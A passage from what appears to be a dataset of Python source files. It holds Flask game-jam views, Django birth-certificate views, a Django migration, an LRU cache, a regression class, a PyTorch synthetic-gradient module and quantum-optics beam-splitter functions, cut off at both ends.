        id = Database.getInstance().AddNewJam(
            name = data['name'],
            theme = data['theme'],
            startDateString = data['startDate'],
            endDateString = data['endDate'],
            about = data['about']
        )
        # The trailing True presumably marks the creator as moderator
        # (see myjams_page's 'moderating' list) -- confirm.
        Database.getInstance().UserAttendJam(current_user.data.id, id, True)
        return redirect(url_for("jam_page", jam_id=id))
@login_required
def editjam_page(jam_id):
    """GET: jam edit form pre-filled from the stored jam (404 if unknown).
    POST: validate and persist the changes, then redirect to the jam."""
    if request.method == "GET":
        jam = Database.getInstance().GetGameJam(jam_id)
        if jam is None:
            abort(404)
        current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
        values = {
            "data": {
                "startDate": '{date:%Y-%m-%dT%H:%M}'.format(date=jam.startDate),
                "endDate": '{date:%Y-%m-%dT%H:%M}'.format(date=jam.endDate),
                "name": jam.name,
                "theme": jam.theme,
                "about": jam.about
            }
        }
        return render_jam_page(values, current_datetime, edit_mode = True)
    else:
        valid = validate_newjam_form(request.form)
        if not valid:
            # Re-render with the user's input and validation errors.
            current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
            return render_jam_page(request.form, current_datetime, edit_mode = True)
        data = request.form.data
        Database.getInstance().UpdateJam(
            jam_id = jam_id,
            name = data['name'],
            theme = data['theme'],
            startDateString = data['startDate'],
            endDateString = data['endDate'],
            about = data['about']
        )
        return redirect(url_for("jam_page", jam_id=jam_id))
def validate_newjam_form(form):
    """Validate the new/edit jam form in place.

    Populates ``form.data`` with cleaned values and ``form.errors`` with
    per-field messages; returns True when no errors were recorded.

    Bug fix: the original called ``datetime.strptime`` unguarded, so a
    malformed date raised an uncaught ValueError (HTTP 500) instead of a
    form error.
    """
    form.data = {}
    form.errors = {}
    # validate dates; reject values that do not parse instead of crashing
    startDateString = form.get("startDate", "2021-01-01T00:00")
    endDateString = form.get("endDate", "2021-01-01T00:00")
    startDate = endDate = None
    try:
        startDate = datetime.strptime(startDateString, '%Y-%m-%dT%H:%M')
        form.data['startDate'] = startDateString
    except ValueError:
        form.errors['startDate'] = "Start date is not a valid date."
    try:
        endDate = datetime.strptime(endDateString, '%Y-%m-%dT%H:%M')
        form.data['endDate'] = endDateString
    except ValueError:
        form.errors['endDate'] = "End date is not a valid date."
    # Ordering check only makes sense when both dates parsed.
    if startDate and endDate and endDate <= startDate:
        form.errors['endDate'] = "End date must be after start date!"
    # validate jam name
    jam_name = form.get("name", "").strip()
    if len(jam_name) == 0:
        form.errors["name"] = "Jam name can not be blank."
    elif len(jam_name) > 255:
        form.errors["name"] = "Jam name is too long."
    else:
        form.data["name"] = jam_name
    # validate jam theme
    theme = form.get("theme", "").strip()
    if len(theme) == 0:
        form.errors["theme"] = "Theme can not be blank."
    elif len(theme) > 255:
        form.errors["theme"] = "Theme is too long."
    else:
        form.data["theme"] = theme
    form.data["about"] = form.get("about", "")
    return len(form.errors) == 0
def teams_page(jam_id):
    """List the teams registered for the given jam."""
    jam_teams = Database.getInstance().GetTeams(jam_id)
    return render_template('teams.html', teams=jam_teams, jam_id=jam_id)
def viewteam_page(team_id):
    """GET: show a team's info page (404 if unknown).  POST with 'delete':
    remove the team and go home; any other POST returns to the team page."""
    if request.method == "GET":
        team = Database.getInstance().GetTeam(team_id)
        if team is None:
            abort(404)
        # Expand the looking_for bitmask into role names for the template.
        team.roles = decodeRoles(team.looking_for)
        return render_template('team_info.html', team=team, moderator=team.leader_id == current_user.data.id)
    else:
        if request.form.get('delete', None) is not None:
            Database.getInstance().DeleteTeam(team_id)
            return redirect(url_for("home_page"))
        # Bug fix: a POST without 'delete' used to fall through and return
        # None, which Flask turns into a 500; redirect back instead.
        return redirect(url_for("viewteam_page", team_id=team_id))
@login_required
def editteam_page(jam_id, team_id):
    """GET: team edit form pre-filled from the stored team (404 if
    unknown).  POST: validate and persist the changes."""
    # TODO: Check if jam exists and user is in it
    if request.method == "GET":
        team = Database.getInstance().GetTeam(team_id)
        if team is None:
            abort(404)
        print(team.name)
        values = { "data":
            {
                'name': team.name,
                'about': team.about,
                'specs': team.looking_for
            }}
        return render_template(
            "newteam.html",
            values = values,
            pow = pow,
            options = getSpecializations(),
            contains = specsContains,
            edit_mode = True
        )
    else:
        valid = validate_newteam_form(request.form, getSpecializations())
        if not valid:
            # Re-render with the user's input and validation errors.
            return render_template(
                "newteam.html",
                values = request.form,
                pow = pow,
                options = getSpecializations(),
                contains = specsContains,
                edit_mode = True
            )
        data = request.form.data
        Database.getInstance().UpdateTeam(
            name = data['name'],
            about = data['about'],
            specs = data['specs'],
            team_id = team_id
        )
        return redirect(url_for("viewteam_page", team_id=team_id))
@login_required
def newteam_page(jam_id):
    """GET: blank team-creation form.  POST: validate, create the team and
    its chat room, join the creator to both, then show the team page."""
    # TODO: Check if jam exists and user is in it
    if request.method == "GET":
        values = { "data": {}}
        return render_template(
            "newteam.html",
            values = values,
            pow = pow,
            options = getSpecializations(),
            contains = specsContains,
            edit_mode = False
        )
    else:
        valid = validate_newteam_form(request.form, getSpecializations())
        if not valid:
            # Re-render with the user's input and validation errors.
            return render_template(
                "newteam.html",
                values = request.form,
                pow = pow,
                options = getSpecializations(),
                contains = specsContains,
                edit_mode = False
            )
        db = Database.getInstance()
        chat_id = db.CreateChatroom()
        data = request.form.data
        team_id = db.CreateTeam(
            name = data['name'],
            about = data['about'],
            specs = data['specs'],
            creator_id = current_user.get_id(),
            jam_id = jam_id,
            chat_id = chat_id
        )
        user_id = current_user.get_id()
        db.JoinChatroom(user_id=user_id, chat_id=chat_id)
        db.JoinTeam(user_id=user_id, team_id=team_id)
        return redirect(url_for("viewteam_page", team_id=team_id))
def validate_newteam_form(form, options):
    """Validate the team create/edit form in place.

    Fills ``form.data`` with cleaned values and ``form.errors`` with
    per-field messages; returns True when no errors were recorded.
    """
    form.data = {}
    form.errors = {}

    def _check_text(field, value, limit, label):
        # Record the trimmed value, or the appropriate error message.
        if not value:
            form.errors[field] = "{} can not be blank.".format(label)
        elif len(value) > limit:
            form.errors[field] = "{} is too long.".format(label)
        else:
            form.data[field] = value

    _check_text("name", form.get("name", "").strip(), 255, "Name")
    _check_text("about", form.get("about", "").strip(), 511, "About")
    # Fold the selected specialization checkboxes into a single bitmask.
    form.data["specs"] = sum(int(form.get(option, 0)) for option in options)
    return not form.errors
@login_required
def myjams_page():
    """List the jams the current user attends and the jams they moderate,
    both sorted by start date ascending."""
    gamejams = Database.getInstance().GetGameJamsAttending(current_user.get_id())
    return render_template(
        "mygamejams.html",
        now = datetime.now(),
        gamejams = sorted(gamejams['attending'], key=lambda x: x.startDate, reverse=False),
        moderating = sorted(gamejams['moderating'], key=lambda x: x.startDate, reverse=False)
    )
def profile_page(user_id):
    """Show another user's public profile, or 404 when they don't exist."""
    viewed_user = Database.getInstance().GetUser(user_id)
    if viewed_user:
        return render_template("profile.html", user= viewed_user, other_user = True)
    abort(404)
@login_required
def my_profile_page():
    """GET: show the logged-in user's own profile.  POST: delete the
    account and return to the home page."""
    user_data = current_user.data
    if request.method == "GET":
        return render_template("profile.html", user= user_data , other_user = False)
    else:
        Database.getInstance().DeleteUser(user_data.id)
        return redirect(url_for('home_page'))
@login_required
def editprofile_page():
    """GET: signup form pre-filled with the current user's data (edit
    mode).  POST: validate and persist the profile changes."""
    user_data = current_user.data
    if request.method == "GET":
        # The stored full name is split back into first/last on the last space.
        names = user_data.name.split(' ')
        first_name = ' '.join(names[:-1])
        last_name = names[-1]
        values = {
            "data":{
                "firstname": first_name,
                "lastname": last_name,
                "about": user_data.about,
                "primary": user_data.primary_spec_raw,
                "secondary": user_data.secondary_specs_raw,
                "experience": user_data.experience,
            }
        }
        return render_template(
            "signup.html",
            values = values,
            pow = pow,
            options = getSpecializations(),
            contains = specsContains,
            edit_mode = True
        )
    else:
        options = getSpecializations()
        # edit_mode=True skips the email/password checks in the validator.
        valid = validate_signup_form(request.form, options, True)
        if not valid:
            return render_template(
                "signup.html",
                values=request.form,
                pow = pow,
                options = options,
                contains = specsContains
            )
        data = request.form.data
        Database.getInstance().UpdateUser(
            user_id = user_data.id,
            first_name = data["firstname"],
            last_name = data["lastname"],
            about = data["about"],
            primary_spec = data["primary"],
            secondary_spec = data["secondary"],
            experience = data["experience"]
        )
        return redirect(url_for("my_profile_page"))
def signup_page():
    """GET: blank signup form.  POST: validate and create the account,
    then redirect to the home page."""
    if request.method == "GET":
        values = { "data": {"password": ""}}
        return render_template(
            "signup.html",
            values = values,
            pow = pow,
            options = getSpecializations(),
            contains = specsContains,
            edit_mode = False
        )
    else:
        options = getSpecializations()
        valid = validate_signup_form(request.form, options)
        if not valid:
            # Re-render with the user's input and validation errors.
            return render_template(
                "signup.html",
                values=request.form,
                pow = pow,
                options = options,
                contains = specsContains
            )
        Database.getInstance().AddNewUser(
            email = request.form.data["email"],
            first_name = request.form.data["firstname"],
            last_name = request.form.data["lastname"],
            about = request.form.data["about"],
            primary_spec = request.form.data["primary"],
            secondary_spec = request.form.data["secondary"],
            experience = request.form.data["experience"],
            password = request.form.data["password"]
        )
        return redirect(url_for("home_page"))
def validate_signup_form(form, options, edit_mode = False):
    """Validate the signup/profile form in place.

    Fills ``form.data`` with cleaned values and ``form.errors`` with
    per-field messages; returns True when no errors were recorded.  With
    ``edit_mode`` the email and password checks are skipped.
    """
    form.data = {}
    form.errors = {}
    # validate first name
    first_name = form.get("firstname", "").strip()
    if len(first_name) == 0:
        form.errors["firstname"] = "First name can not be blank."
    elif len(first_name) > 127:
        form.errors["firstname"] = "First name is too long."
    else:
        form.data["firstname"] = first_name
    # validate last name
    last_name = form.get("lastname", "").strip()
    if len(last_name) == 0:
        form.errors["lastname"] = "Last name can not be blank."
    elif len(last_name) > 127:
        form.errors["lastname"] = "Last name is too long."
    else:
        form.data["lastname"] = last_name
    if not edit_mode:
        # validate email
        email = form.get("email", "").strip()
        if len(email) == 0:
            form.errors["email"] = "Email can not be blank."
        elif Database.getInstance().GetUser(email, field = 'email'):
            form.errors["email"] = "Email already in use."
        else:
            form.data["email"] = email
        # validate password
        password = form.get("password", "")
        if len(password) == 0:
            form.errors["password"] = "Password can not be blank."
        elif False:
            # NOTE(review): dead branch -- password strength was never
            # implemented, so any non-empty password is accepted.
            # TODO:validate password
            pass
        else:
            form.data["password"] = password
    primary_spec = int(form.get("primary", -1))
    if primary_spec < 0:
        form.errors["primary"] = "You must choose a primary specialization."
    else:
        form.data["primary"] = primary_spec
    # Fold the secondary specialization checkboxes into one bitmask.
    secondary_spec = 0
    for option in options:
        secondary_spec += int(form.get(option, 0))
    form.data["secondary"] = secondary_spec
    about = form.get("about", "").strip()
    if len(about) == 0:
        form.errors["about"] = "About can not be blank."
    else:
        form.data["about"] = about
    experience = form.get("experience", "").strip()
    if len(experience) == 0:
        form.errors["experience"] = "Experience can not be blank."
    else:
        form.data["experience"] = experience
    return len(form.errors) == 0
def login_page():
    """GET: blank login form.  POST: validate credentials, start the Flask
    session and redirect home."""
    if request.method == "GET":
        values = { "data": {"password": ""}}
        return render_template(
            "login.html",
            values = values
        )
    else:
        valid = validate_login_form(request.form)
        if not valid:
            # Re-render with the user's input and validation errors.
            return render_template(
                "login.html",
                values=request.form,
            )
        # The validator stashed the matched user record in form.data["user"].
        login_user(load_user(request.form.data["user"].id))
        return redirect(url_for("home_page"))
def validate_login_form(form):
    """Validate the login form in place.

    Fills ``form.data`` (including the matched user record under "user")
    and ``form.errors``; returns True only for a registered email with
    the correct password.  Short-circuits on the first failure.
    """
    form.data = {}
    form.errors = {}
    email = form.get("email", "").strip()
    if len(email) == 0:
        form.errors["email"] = "Email can not be blank."
        return False
    user = Database.getInstance().GetUser(email, field = 'email')
    form.data["user"] = user
    if user is None :
        form.data["email"] = email
        form.errors["email"] = "Email is not registered"
        return False
    form.data["email"] = email
    password = form.get("password", "")
    if len(password) == 0:
        form.errors["password"] = "Password can not be blank"
        return False
    if not Database.getInstance().ValidatePassword(email, password):
        form.errors["password"] = "Password is incorrect"
        return False
    form.data["password"] = password
    return len(form.errors) == 0
@login_required
def logout_page():
    """Terminate the current session and bounce to the landing page."""
    logout_user()
    return redirect(url_for("home_page"))
|
18,338 | 63dcf14fa757864dad7c15fe6f83dde878126a96 | from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import JsonResponse
from django.db.models import Count
from BirthRegisterSystem.models import Area
from .models import NewChildInfo
import json
import datetime
def AddHospital(request):
    """Render the hospital landing page."""
    template_name = 'HospitalIndex.html'
    return render(request, template_name)
def ScanCertificate(request):
    """Render the certificate-scanning page."""
    template_name = 'Scan.html'
    return render(request, template_name)
def ApplyBirthCertificate(request):
    """Render the birth-certificate form with the distinct division names."""
    divisions = (Area.objects.values('Division_name')
                 .distinct().order_by('Division_name'))
    return render(request, 'ApplyBirthCertificate.html', {'Division': divisions})
def ApplyDeathCertificate(request):
    """Render the death-certificate application page."""
    template_name = 'ApplyDeathCertificate.html'
    return render(request, template_name)
def PrintBirthCertificate(request):
    """List validated child records ready for certificate printing."""
    validated_children = NewChildInfo.objects.filter(Validation=1)
    return render(request, 'PrintBirthCertificate.html', {'childInfo': validated_children})
def PrintDeathCertificate(request):
    """Render the death-certificate printing page."""
    template_name = 'PrintDeathCertificate.html'
    return render(request, template_name)
def RequestForUpdate(request):
    """Render the record-update request page."""
    template_name = 'RequestForUpdate.html'
    return render(request, template_name)
def ApplyBirthCertificateForm(request):
    """Persist a birth-certificate application from the submitted form,
    then re-render the application page."""
    post = request.POST
    new_child_info = NewChildInfo(
        Name=post["name"],
        Blood_group=post["blood_group"],
        Birth_Date=post["birth_date"],
        Father_name=post["father_name"],
        Father_NID=post["father_nid"],
        Mother_name=post["mother_name"],
        Religion=post["religion"],
        Division_name=post["DropDownDivision"],
        District_name=post["DropDownDistrict"],
        Upazila_name=post["DropDownUpazila"],
        Union_name=post["DropDownUnion"],
    )
    new_child_info.save()
    return render(request, 'ApplyBirthCertificate.html')
def getDistrict(request, division_name):
    """Return the distinct district names of a division as JSON."""
    districts = (Area.objects.filter(Division_name=division_name)
                 .values('District_name').distinct().order_by('District_name'))
    return JsonResponse({"Districts": list(districts)})
def getUpazila(request, district_name):
    """Return the distinct upazila names of a district as JSON."""
    upazilas = (Area.objects.filter(District_name=district_name)
                .values('Upazila_name').distinct().order_by('Upazila_name'))
    return JsonResponse({"Upazilas": list(upazilas)})
def getUnion(request, upazila_name):
    """Return the distinct union names of an upazila as JSON."""
    unions = (Area.objects.filter(Upazila_name=upazila_name)
              .values('Union_name').distinct().order_by('Union_name'))
    return JsonResponse({"Unions": list(unions)})
|
def solve(n, m):
    """Return the answer for inputs N, M.

    First form min(N, M // 2) pairings that each consume two units of M,
    then group the leftover M in fours.  (Decomposed from main() so the
    logic is unit-testable; the dead ``cnt = 0`` pre-assignment in the
    original is gone.)
    """
    pairs = min(n, m // 2)
    leftover = m - 2 * pairs
    return pairs + leftover // 4


def main():
    # Read "N M" from stdin and print the computed count.
    N, M = map(int, input().split())
    print(solve(N, M))


if __name__ == "__main__":
    main()
18,340 | e614cb92627a84ea4654b7eba4efc40b2dd2d5f4 | import torch
import torch.nn as nn
import numpy as np
class dni_linear(nn.Module):
    """Synthetic-gradient (DNI) module: a 3-layer MLP that maps an
    activation of size ``input_dims`` to a predicted gradient of the same
    size, optionally conditioned on a label vector of size ``num_classes``.
    """
    # TODO : initialise the last layer with zeroes
    def __init__(self, input_dims, num_classes, dni_hidden_size=1024, conditioned=False):
        super(dni_linear, self).__init__()
        self.conditioned = conditioned
        # When conditioned, the label vector is concatenated to the input,
        # so the first layer takes input_dims + num_classes features.
        if self.conditioned:
            dni_input_dims = input_dims + num_classes
        else:
            dni_input_dims = input_dims
        self.layer1 = nn.Sequential(
            nn.Linear(dni_input_dims, dni_hidden_size),
            nn.BatchNorm1d(dni_hidden_size),
            nn.ReLU()
        )
        self.layer2 = nn.Sequential(
            nn.Linear(dni_hidden_size, dni_hidden_size),
            nn.BatchNorm1d(dni_hidden_size),
            nn.ReLU()
        )
        self.layer3 = nn.Linear(dni_hidden_size, input_dims)

    def forward(self, x, y=None):
        """Return the predicted gradient for *x*.

        Fix: *y* now defaults to None, so unconditioned callers no longer
        have to pass a dummy label argument (backward compatible -- the
        conditioned path still asserts a label was supplied).
        """
        if self.conditioned:
            assert y is not None
            x = torch.cat((x, y), 1)
        out = self.layer1(x)
        out = self.layer2(out)
        out = self.layer3(out)
        return out
|
class LRUCache:
    """Least-recently-used cache with O(1) get/put.

    Fixes over the original implementation:
      * the original called ``datetime.datetime.now()`` without importing
        ``datetime``, so it raised NameError outside LeetCode's harness;
      * wall-clock timestamps can collide within clock resolution, making
        eviction pick an arbitrary key -- recency order is now tracked
        exactly via dict insertion order (Python 3.7+ guarantees it);
      * eviction scanned every key (O(n)); it is now O(1).
    """

    def __init__(self, capacity: int):
        self.capacity = capacity  # maximum number of entries held
        # key -> value; maintained so that iteration order is
        # least-recently-used first, most-recently-used last.
        self.cache = {}

    def get(self, key: int) -> int:
        """Return the value for *key*, or -1 when absent (LeetCode
        convention), refreshing the key's recency on a hit."""
        if key not in self.cache:
            return -1
        # Re-insert to move the key to the most-recently-used position.
        value = self.cache.pop(key)
        self.cache[key] = value
        return value

    def put(self, key: int, value: int) -> None:
        """Insert or overwrite *key*, evicting the least-recently-used
        entry when the cache is full."""
        if key in self.cache:
            # Existing key: remove so re-insertion refreshes recency.
            self.cache.pop(key)
        elif len(self.cache) >= self.capacity:
            # The first key in iteration order is the LRU entry.
            oldest = next(iter(self.cache))
            del self.cache[oldest]
        self.cache[key] = value
# Your LRUCache object will be instantiated and called as such:
# obj = LRUCache(capacity)
# param_1 = obj.get(key)
# obj.put(key,value)
|
18,342 | 0b72b27113cdd9dfed27eb58da60a11cbadcacc3 | # Generated by Django 3.1.7 on 2021-04-09 13:16
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema: ForgotPassword, Like, Post and User tables.

    Auto-generated by Django 3.1.7.  Do not hand-edit field definitions
    once this migration has been applied anywhere.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='ForgotPassword',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('passwordID', models.CharField(max_length=255)),
                ('username', models.CharField(max_length=255)),
                ('password', models.CharField(max_length=255)),
                ('status', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Like',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('likeID', models.CharField(max_length=255)),
                ('postAuthor', models.CharField(max_length=255)),
                ('likeAuthor', models.CharField(max_length=255)),
                # NOTE(review): dates are stored as CharField here and below;
                # DateTimeField would enable ordering/filtering -- confirm.
                ('likeDate', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('postID', models.CharField(max_length=255)),
                ('postPreview', models.CharField(max_length=500)),
                ('content', models.CharField(max_length=500)),
                ('author', models.CharField(max_length=255)),
                ('publish_date', models.CharField(max_length=255)),
                ('like_count', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('userID', models.CharField(max_length=255)),
                ('username', models.CharField(max_length=255)),
                ('photo', models.ImageField(blank=True, null=True, upload_to='Images/')),
                ('fullname', models.CharField(max_length=255)),
                ('email', models.CharField(max_length=255)),
                # NOTE(review): 'birtdate' is a typo for 'birthdate'; renaming
                # now requires a follow-up migration, not an edit here.
                ('birtdate', models.CharField(max_length=255)),
                ('password', models.CharField(max_length=255)),
                ('last_join', models.CharField(max_length=255)),
                ('about', models.CharField(max_length=255)),
                ('me_flow', models.CharField(max_length=255)),
                ('flow', models.CharField(max_length=255)),
            ],
        ),
    ]
|
18,343 | c6f64e8a72a36c610fa770cee7703fb617fde4ec | from .ModelInterface import ModelInterface
import numpy as np
class MultipleLinearRegression(ModelInterface):
    """Ordinary least squares linear regression fit via the normal
    equations."""

    def __init__(self):
        # Weight vector; the integer 0 is a pre-fit placeholder.
        self._w = 0

    def fit(self, X, y):
        """Solve the normal equations (X^T X) w = X^T y and return self.

        X is the (n, d) design matrix and y the (n,) target vector.
        """
        self._w = np.linalg.solve(np.dot(X.T, X), np.dot(X.T, y))
        return self

    def predict(self, X):
        """Return the (n,) prediction vector for the rows of X.

        Bug fix: the original returned the elementwise product
        ``self._w * X`` (an (n, d) array); the model prediction is the
        matrix-vector product ``X @ w``.
        """
        return X.dot(self._w)

    def score(self, X, y):
        """Return the R^2 coefficient of determination on (X, y)."""
        m = y - np.mean(y)
        n = y - self.predict(X)
        return 1 - (n.dot(n) / m.dot(m))
|
18,344 | 6e6b4a89c4256d4e190f6113d8caacb9191246b1 | import cmath
import numpy as np
from scipy.misc import factorial as fact
from math import sqrt, factorial
def bs2x2_transform(t, r, input_state):
    """
    Two-channel (2x2) beam splitter transformation, with t^2 + r^2 = 1.
    :param t: Transmission coefficient.
    :param r: Reflection coefficient.
    :param input_state: Unapplied state in two channels (modes).
    :return: Transformed unapplied state in two channels (modes).
    """
    size = len(input_state)
    # Output photon numbers can reach 2*(size - 1) in either channel.
    output_state = np.zeros((size * 2 - 1, size * 2 - 1), dtype=complex)
    for m, n in np.ndindex(size, size):
        norm = factorial(m) * factorial(n)
        # Binomial expansion of the splitter mapping for the (m, n) term.
        for k in range(m + 1):
            for l in range(n + 1):
                out1 = m - k + l  # photons ending up in channel 1
                out2 = k + n - l  # photons ending up in channel 2
                weight = ((1j * r) ** (k + l) * t ** (m - k + n - l) * norm
                          / (factorial(k) * factorial(m - k) * factorial(l) * factorial(n - l)))
                output_state[out1, out2] += input_state[m, n] * weight
    return output_state
def two_bs2x4_transform(t1, r1, t2, r2, input_state):
    """
    Transformation at 2 beam splitters: two input channels mapped to four
    output channels (2x4). Creation operator mapping:
        a1 => t1 a2 + i r1 a1
        a2 => t2 a4 + i r2 a3
    with t1^2 + r1^2 = 1 and t2^2 + r2^2 = 1.
    :param t1: BS1 transmission.
    :param r1: BS1 reflection.
    :param t2: BS2 transmission.
    :param r2: BS2 reflection.
    :param input_state: Two channels (modes) unapplied state.
    :return: Four channels (modes) unapplied state.
    """
    size = len(input_state)
    output_state = np.zeros((size,) * 4, dtype=complex)
    for m, n in np.ndindex(size, size):
        norm = factorial(m) * factorial(n)
        # Binomial expansion of both splitter mappings.
        for k in range(m + 1):
            for l in range(n + 1):
                weight = ((1j * r1) ** k * t1 ** (m - k)
                          * (1j * r2) ** l * t2 ** (n - l)
                          * norm
                          / (factorial(k) * factorial(m - k) * factorial(l) * factorial(n - l)))
                # Channels: (1, 2) from input 1, (3, 4) from input 2.
                output_state[k, m - k, l, n - l] += input_state[m, n] * weight
    return output_state
def two_bs2x4_transform_opt(t1, r1, t2, r2, input_state):
    """
    Transformation at 2 beam splitters. Optimised version
    Two input channels and four output channles - 2x4 transformation.
    Creation operators transformation:
    a1 => t1 a2 + i r1 a1.
    a2 => t2 a4 + i r2 a3.
    With transmission and reflection coefficients:
    t1^2 + r1^2 = 1.
    t2^2 + r2^2 = 1.
    :param t1: BS1 transmission.
    :param r1: BS1 reflection.
    :param t2: BS2 transmission.
    :param r2: BS2 reflection.
    :param input_state: Two channels(modes) unapllied state.
    :return: Four channels(modes) unapllied state.
    """
    size = len(input_state)
    out = np.zeros((size,) * 4, dtype=complex)

    # One term of both binomial expansions for a fixed split (k1, k2) of the
    # first input's photons and (k3, k4) of the second's.
    def coef(k1, k2, k3, k4):
        return t1 ** k2 * (1j * r1) ** k1 * t2 ** k4 * (1j * r2) ** k3 / (factorial(k1) * factorial(k2) * factorial(k3) * factorial(k4))

    # index 'i' = (m,n,k,l)
    # i[0], i[1] are the input photon numbers; i[2] <= i[0] and i[3] <= i[1]
    # pick one expansion term each. The output index tuple determines
    # (m, n, k, l) uniquely, so plain assignment (no accumulation) suffices.
    for i in np.ndindex(size, size, size, size):
        if i[2] <= i[0] and i[3] <= i[1] and i[0] + i[1] < size:
            out[i[2], i[0] - i[2], i[3], i[1] - i[3]] = coef(i[2], i[0] - i[2], i[3], i[1] - i[3]) * input_state[i[0], i[1]] * factorial(i[0]) * factorial(i[1])
    return out
def detection(input_state, detection_event):
    """
    Transformation of the state with a POVM (detection) operator.

    Keeps only the components of the state compatible with the detection
    outcome in channels 1 and 3; everything else is zeroed.
    :param input_state: Applied/unapplied state in 4 channels (modes).
    :param detection_event: One of 'BOTH', 'NONE', 'FIRST', 'THIRD'.
    :return: Applied/unapplied state in 4 channels (modes).
    :raises ValueError: If detection_event is not a recognised event.
    """
    # Bug fix: the original compared photon numbers with `is` / `is not`,
    # which tests object identity, not equality (it only worked because of
    # CPython's small-int caching and raises SyntaxWarning on 3.8+).
    size = len(input_state)
    output_state = np.zeros((size,) * 4, dtype=complex)
    if detection_event == 'BOTH':
        # Clicks in both detectors: p1 > 0 and p3 > 0.
        output_state[1:, :, 1:, :] = input_state[1:, :, 1:, :]
    elif detection_event == 'NONE':
        # No clicks: p1 == 0 and p3 == 0.
        output_state[0, :, 0, :] = input_state[0, :, 0, :]
    elif detection_event == 'FIRST':
        # Click in detector 1 only: p1 > 0 and p3 == 0.
        output_state[1:, :, 0, :] = input_state[1:, :, 0, :]
    elif detection_event == 'THIRD':
        # Click in detector 3 only: p1 == 0 and p3 > 0.
        output_state[0, :, 1:, :] = input_state[0, :, 1:, :]
    else:
        raise ValueError('Wrong configuration')
    return output_state
def det_probability(input_state, detection_event):
    """
    Calculating a probability of an event realisation.
    :param input_state: Unapplied state in 4 channels.
    :param detection_event: Detection event.
    :return: Probability of the detection.
    """
    # Project the state onto the detection outcome, then form the overlap
    # of the applied input state with the applied, conjugated projection.
    st_aft_det_unappl = detection(input_state, detection_event)
    st_aft_det_conj_app = np.conj(make_state_appliable_4ch(st_aft_det_unappl))
    input_state_appl = make_state_appliable_4ch(input_state)
    st = np.multiply(input_state_appl, st_aft_det_conj_app)
    # The sum is real for a valid projection; keep only the real part.
    return np.real(np.sum(st))
def state_norm(state):
    """
    Norm of an unapplied state in 4 channels:
    sqrt(sum |c|^2 * p1! * p2! * p3! * p4!).
    :param state: Unapplied state in 4 channels.
    :return: Norm of the state.
    """
    size = len(state)
    total = 0
    for idx in np.ndindex(size, size, size, size):
        weight = 1
        for photons in idx:
            weight *= factorial(photons)
        total += abs(state[idx]) ** 2 * weight
    return sqrt(total)
def state_norm_opt(state):
    """
    Optimized (vectorised) norm of an unapplied state in 4 channels.
    :param state: Unapplied state in 4 channels.
    :return: Norm of the state.
    """
    size = len(state)
    # weights[p1, p2, p3, p4] = p1! * p2! * p3! * p4!
    facts = np.array([factorial(k) for k in range(size)])
    pair = np.tensordot(facts, facts, axes=0)
    weights = np.tensordot(pair, pair, axes=0)
    return sqrt(np.sum(np.abs(state) ** 2 * weights))
def dens_matrix_with_trace(left_vector, right_vector):
    """
    Composing density matrix from projected vectors and partially trace.
    Channels 1 and 3 are traced out; channels 2 and 4 are kept.
    :param left_vector: Ket unapplied state in 4 channels.
    :param right_vector: Bra unapplied state in 4 channels.
    :return: Applied dens matrix for 2 channels, indexed [p2, p4, p2_, p4_].
    """
    size = len(left_vector)
    if len(left_vector) != len(right_vector):
        raise ValueError('Incorrect dimensions')
    right_vector_conj = np.conj(right_vector)
    dm = np.zeros((size,) * 4, dtype=complex)
    for p2 in range(size):
        for p2_ in range(size):
            for p4 in range(size):
                for p4_ in range(size):
                    matrix_sum = 0
                    # Trace over channels 1 and 3: factorial(k1)*factorial(k3)
                    # are the <k|k> norms of the traced-out modes; the sqrt
                    # factor applies the operators of the kept modes.
                    for k1 in range(size):
                        for k3 in range(size):
                            matrix_sum = matrix_sum + left_vector[k1, p2, k3, p4] * right_vector_conj[k1, p2_, k3, p4_] * factorial(k1) * factorial(k3) * sqrt(factorial(p2)*factorial(p4)*factorial(p2_)*factorial(p4_))
                    dm[p2, p4, p2_, p4_] = matrix_sum
    return dm
def dens_matrix_with_trace_opt(left_vector, right_vector):
    """
    Optimized version.
    Composing density matrix from projected vectors and partially trace.
    Channels 1 and 3 are traced out; channels 2 and 4 are kept.
    :param left_vector: Ket unapplied state in 4 channels.
    :param right_vector: Bra unapplied state in 4 channels.
    :return: Applied dens matrix for 2 channels, indexed [p2, p4, p2_, p4_].
    """
    size = len(left_vector)
    if len(left_vector) != len(right_vector):
        raise ValueError('Incorrect dimensions')
    right_vector_conj = np.conj(right_vector)
    dm = np.zeros((size,) * 4, dtype=complex)
    # tf2[k1, k3] = k1! * k3! - the norm factors of the traced-out channels.
    fact_arr = np.array([factorial(x) for x in range(size)])
    tf2 = np.tensordot(fact_arr, fact_arr, axes=0)
    for p2 in range(size):
        for p2_ in range(size):
            for p4 in range(size):
                for p4_ in range(size):
                    # Vectorised double sum over the traced indices k1, k3.
                    prod1 = np.multiply(left_vector[:, p2, :, p4], right_vector_conj[:, p2_, :, p4_])
                    prod2 = prod1 * sqrt(factorial(p2) * factorial(p4) * factorial(p2_) * factorial(p4_))
                    prod3 = np.multiply(prod2, tf2)
                    dm[p2, p4, p2_, p4_] = np.sum(prod3)
    return dm
def dens_matrix(state):
    """
    Build a density matrix in 2 channels.
    :param state: Applied state in 2 channels.
    :return: Applied density matrix for 2 channels,
             dm[p1, p2, p1_, p2_] = state[p1, p2] * conj(state[p1_, p2_]).
    """
    # Outer product |psi><psi| over both channel indices.
    return np.tensordot(state, np.conj(state), axes=0).astype(complex)
def dens_matrix_4ch(state):
    """
    Build a density matrix in 4 channels.
    :param state: Applied state in 4 channels.
    :return: Applied 8-index density matrix for 4 channels:
